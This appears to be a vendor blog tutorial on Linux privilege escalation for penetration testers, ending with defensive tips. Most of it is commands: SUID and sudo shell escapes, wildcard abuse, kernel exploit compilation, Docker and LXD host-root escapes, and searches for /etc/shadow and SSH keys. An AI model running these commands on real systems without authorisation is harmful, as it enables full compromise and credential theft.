Linux Privilege Escalation: From User to Root
Master Linux privilege escalation techniques used in real-world penetration tests. Learn systematic enumeration and exploitation methods.
Posted by
HackFast Security TeamRelated reading
Advanced Nmap Techniques for Network Discovery
Master advanced Nmap scanning techniques, stealth methods, and custom scripts for comprehensive network reconnaissance in penetration testing.
Complete Web Application Penetration Testing Guide
Comprehensive methodology for testing web applications, from reconnaissance to exploitation. Learn the systematic approach used by professional pentesters.
Linux Privilege Escalation Fundamentals
Privilege escalation is often the critical step that turns a limited shell into full system compromise. This guide covers systematic approaches to escalating privileges on Linux systems, from basic enumeration to advanced exploitation techniques.
Initial Enumeration
Start with comprehensive system enumeration to identify potential attack vectors:
# System information
uname -a
cat /etc/issue
cat /etc/*release*
# Current user and groups
id
groups
whoami
# Sudo permissions
sudo -l
# SUID binaries
find / -perm -4000 -type f 2>/dev/null
# World-writable files
find / -perm -2 -type f 2>/dev/null
# Cron jobs
cat /etc/crontab
ls -la /etc/cron*
crontab -lSUID Binary Exploitation
SUID binaries running as root are prime targets for privilege escalation:
# Common exploitable SUID binaries
/bin/bash -p
/usr/bin/vim -c ':!/bin/bash'
/usr/bin/find . -exec /bin/bash -p ; -quit
/usr/bin/nmap --interactive
/usr/bin/python -c 'import os; os.system("/bin/bash")'
# Custom SUID binary analysis
strings /path/to/suid/binary
ltrace /path/to/suid/binary
strace /path/to/suid/binarySudo Misconfigurations
Sudo misconfigurations are extremely common. Look for these patterns:
# Dangerous sudo entries
user ALL=(ALL) NOPASSWD: /bin/bash
user ALL=(ALL) NOPASSWD: /usr/bin/vim
user ALL=(ALL) NOPASSWD: /usr/bin/find
user ALL=(ALL) NOPASSWD: /usr/bin/python*
# Wildcard exploitation
# If sudo allows: /home/user/scripts/*.sh
echo '#!/bin/bash' > /home/user/scripts/exploit.sh
echo '/bin/bash' >> /home/user/scripts/exploit.sh
chmod +x /home/user/scripts/exploit.sh
sudo /home/user/scripts/exploit.sh
# Environment variable exploitation
sudo -E /vulnerable/binaryKernel Exploits
When local misconfigurations aren't available, kernel exploits can provide root access:
# Kernel version enumeration
uname -r
cat /proc/version
dmesg | grep Linux
# Common kernel exploits
# DirtyCow (CVE-2016-5195)
gcc -pthread dirty.c -o dirty -lcrypt
# Overlayfs (CVE-2015-1328)
gcc ofs.c -o ofs
# Use linux-exploit-suggester
./linux-exploit-suggester.sh
# Check for container escape opportunities
cat /proc/1/cgroup
ls -la /dev | grep -E "(docker|lxc)"Service and Process Exploitation
Running services often provide privilege escalation opportunities:
# Process enumeration
ps aux
ps -ef
pstree
# Network services
netstat -tulpn
ss -tulpn
# Check for MySQL running as root
ps aux | grep mysql
cat /etc/mysql/my.cnf
# Docker exploitation
docker -H unix:///var/run/docker.sock run -v /:/hostfs -it ubuntu chroot /hostfs bash
# LXD group membership
lxd init
lxc init ubuntu privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/bashFile System Analysis
File permissions and configurations often reveal privilege escalation paths:
# Writable system files
find / -writable -type f 2>/dev/null | grep -v /proc | head -20
# Password files
cat /etc/passwd
cat /etc/shadow
cat /etc/group
# SSH keys
find / -name "*.pem" 2>/dev/null
find / -name "*id_rsa*" 2>/dev/null
find / -name "*id_dsa*" 2>/dev/null
# Configuration files
find /etc -readable -type f 2>/dev/null | head -30
grep -r "password" /etc/ 2>/dev/null
# Log files (may contain credentials)
find /var/log -readable -type f 2>/dev/nullAutomated Tools
Use these tools to automate privilege escalation enumeration:
# LinEnum
./LinEnum.sh
# LinPEAS
./linpeas.sh
# Linux Smart Enumeration
./lse.sh
# PEASS-ng
python3 linpeas.py
# Unix Privesc Check
./unix-privesc-check standardAdvanced Techniques
- LD_PRELOAD exploitation: Hijack shared libraries for privilege escalation
- PATH hijacking: Exploit scripts that don't use absolute paths
- Capabilities abuse: Exploit Linux capabilities assigned to binaries
- NFS exports: Mount exported filesystems with no_root_squash
- Wildcard injection: Exploit shell wildcards in cron jobs or scripts
Defensive Recommendations
Understanding privilege escalation helps defenders secure their systems:
- Regularly audit SUID binaries and remove unnecessary ones
- Implement proper sudo configurations with minimal required permissions
- Keep kernels updated and apply security patches promptly
- Monitor for unusual process execution and privilege changes
- Use tools like HackFast to track and correlate privilege escalation attempts across your infrastructure